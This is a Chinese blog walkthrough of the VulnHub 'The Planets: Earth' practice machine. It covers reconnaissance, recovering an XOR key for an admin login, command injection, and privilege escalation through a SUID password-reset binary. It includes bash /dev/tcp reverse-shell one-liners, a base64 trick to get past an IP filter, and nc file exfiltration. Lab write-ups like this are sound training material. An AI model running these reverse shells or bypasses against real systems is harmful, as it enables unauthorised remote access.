vulnhub靶场The Planets Earth教程

最新推荐文章于 2024-05-13 06:05:18 发布
最新推荐文章于 2024-05-13 06:05:18 发布
阅读量390 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: 网络安全 安全 系统安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/128742439
版权

    • 靶场搭建

靶机下载地址:The Planets: Earth ~ VulnHub

直接解压双击ova文件即可

使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)

难度:简单

攻击机:kali

    • 信息收集

先明确靶机的ip后直接nmap直接扫描

nmap -A -T4 -p- 目标ip

nmap -A -T4 -p- 192.168.21.145

nmap扫描结果

看到一个奇怪的地方

Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local

对此而言就修改/etc/hosts文件加入ip+url就能访问

vim /etc/hosts

添加

192.168.21.145 earth.local
192.168.21.145 terratest.earth.local

直接输入url就能访问

访问结果

啥办法没有只能接着搜集信息,尝试看看有哪些网站

暴力破解直接上

dirb https://terratest.earth.local/
​dirb https://earth.local/

扫描结果

https://terratest.earth.local/里找到一个robots.txt

https://earth.local/里面找到一个admin

先访问看看是啥

https://earth.local/admin/

https://earth.local/admin/ 访问结果

https://terratest.earth.local/robots.txt

https://terratest.earth.local/robots.txt 访问结果

这个里面看到了敏感信息哦testingnots.txt

进去看看

testingnots.txt访问结果

  1. *Using XOR encryption as the algorithm, should be safe as used in RSA.(使用XOR)

  1. *testdata.txt was used to test encryption.(testdata.txt用于测试加密)

  1. *terra used as username for admin portal.(terra是admin的用户名)

所以想办法访问testdata.txt和找用户名密码

所以试试直接访问https://terratest.earth.local/testdata.txt(txt文件不能用dirb扫出来)

https://terratest.earth.local/testdata.txt访问结果

文件内容:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

    • web攻击

只能从上个xor加密入手

根据XOR运算的性质aXORbXORa=b,且在本靶机中,a为message,b为message key,aXORb为previous message;那么只要previous message和message做一次XOR运算,就可以得到message key。(随便写个脚本)(建议使用http://c.jsrun.net/

https://earth.local/页面已知3个previous message,从https://terratest.earth.local/testingnotes.txt已知testdata.txt至少做过一次message。因此要得到message key只要用testdata.txt的内容和3个previous message分别进行XOR操作即可。尝试后发现https://earth.local/页面前两条previous message应该都与testdata.txt无关,XOR运算的结果不可读,第3条应该是testdata.txt内容与message key进行XOR运算的结果。

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

https://gchq.github.io/CyberChef/开始解码

这个应该是文件于是使用hex解一下

解密结果

怎么说像不像二进制,转化为16进制

在进行前文提到的xor操作,将testdata.txt的内容作为key,编码选UTF8,即可得到一组循环的字符串,每组循环都是:earthclimatechangebad4humans

可以登入了

访问结果

此处看到有命令行

看看whoami

运行结果

命令执行!!!

直接执行的话看看能不能反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.21.134/666 <&1'

反弹shell执行结果

文件写入执行结果

想象美好现实骨感被ban了,只能绕过了(直接写入文件也是不可以的),又是老朋友base64编码

为了方便直接用burp的编码模块了

抓包

echo 'bash -i >& /dev/tcp/192.168.21.134/8888 0>&1'>/tmp/1|base64 -d|sh

加密结果

拼接一下就成

    • 渗透攻击

链接完成后

find / -user root -perm /4000 2>/dev/null

其中有个奇怪的/usr/bin/reset_root

看一下文件中可读的内容

strings /usr/bin/reset_root

可以看到这个可执行文件将root的密码修改为Earth

从/usr/bin/reset_root执行失败的返回信息来看,是需要触发条件的,直接执行的话,触发条件都不满足

由于靶机上没有ltrace,所以需要把/usr/bin/reset_root文件传到攻击机上分析。

这里用nc进行传输:

攻击机上监听2222端口,并将接收到的内容重定向到文件reset_root

nc -nlvp 2222 > reset_root

靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口

nc 192.168.101.34 2222 < /usr/bin/reset_root

完成文件传输后,攻击机上给reset_root文件赋予可执行权限

chmod +x reset_root

然后用ltrace跟踪库函数调用

ltrace ./reset_root

可以发现触发条件是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe存在(后来尝试发现是需要三个文件都存在)

在靶机上用touch命令创建这三个文件,创建完成后再执行/usr/bin/reset_root,执行成功,显示root的密码被修改成了Earth

touch /tmp/kcM0Wewe
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
/usr/bin/reset_root

用su命令提权到root,密码为Earth,并在/root目录下获得flag

himobrinehacken
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Planets Earth, Mars and the Moon
12-04
- Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly customizable shaders with normals, night lights, specular, and inner atmosheric ...
Planets Earth Mars and the Moon Untiy官方插件
03-16
Untiy官方插件星球
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3060
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
VulnHub日记(十五): THE PLANETS: EARTH
Dawn_Xi的博客
11-27 2598
参考链接 Vulnhub:THE PLANETS: EARTH 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.136 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.136 dirsearch 枚举目录443和80 dirsearch -u https://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-lis
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记_vulnhub入门靶场
最新发布
2401_84254418的博客
05-13 602
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。vulnhub官网。
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 674
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
VulnHub | The-Planets:Earth
薛定的餓貓
12-10 3867
The Planets: Earth 目录The Planets: Earth项目地址测试环境信息收集漏洞利用权限提升 项目地址 http://www.vulnhub.com/entry/the-planets-earth,755/ 难度:Easy 测试环境 攻击机:Kali 192.168.56.111 目标靶机:Fedora 192.168.56.110 信息收集 打开目标靶机,使用arp-scan -I eth1 -l指定网卡并扫描局域网内存活机器IP,使用nmap扫描开启了什么端口,然后使用-sV参
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1626
靶机名称Earth
Planets Earth Mars and the Moon 0.4.4
08-07
有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版!...
The Planets Digital Preservation Suite-开源
05-13
Planets是一项由欧盟委员会共同资助的为期四年的项目,旨在应对核心数字保存挑战。 该项目开发了一套工具和服务,以长期支持数字内容的保存和访问。
poj 3174 Alignment of the Planets.md
11-17
poj 3174 Alignment of the Planets.md
靶机渗透练习84-The PlanetsEarth
hirak0的博客
04-27 2178
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1717
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
Earth靶机实验实战演练
lianliandad的博客
11-01 925
好好学习
vulnhubearth靶机训练
ccssggoo的博客
03-11 808
靶机下载地址:The Planets: Earth ~ VulnHub 渗透机:kali2022 靶机:未知linux Earth 老规矩先用netdiscover -r 192.168.10.0/24扫描出靶机ip 扫描靶机 发现靶机开放了22,80,443端口,且绑定了dns信息,需要修改hosts文件才能访问,linux中hosts文件在/etc/hosts,windows在C:\Windows\System32\drivers\etc\hosts,在文件后面加入 渗...
VulnHub靶场----Earth
qq_61670993的博客
10-18 486
Vulnhub靶场初体验
vulnhub-Earth靶场练习
ljlrookiebird的博客
09-26 100
vulhub-earth靶场练习
2-vulnhub靶场Earth
qq_49078152的博客
08-14 1645
vulnhub,earth靶机练习
earth靶机详解
weixin_44681307的博客
07-31 187
在cyberchef把密文先用一个hex解密16进制的解密,然后XOR时候放上我们的密钥,这样就能解密出来了,我们发现解密出来的东西很有规律,复制我们最前面的这一串。当我们远程时候发现不让我们远程,这里其实是给我们的ip地址做了一个过滤,就是不让我们输入ip地址,只要有ip地址就不行,但是我们可以用别的方法来绕过。而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字。因为我们得到一个用户名,一个密钥,其实就是我们的密码,肯定还有一个登陆网站。
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气层和表面,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在41亿年前就出现了。 如果你想登录vulnhub靶场"planets"的管理员界面,你可以使用用户名"terra"和密码"earthclimatechangebad4humans"登录https://earth.local/admin。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [靶场练习第二天~vulnhub靶场THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值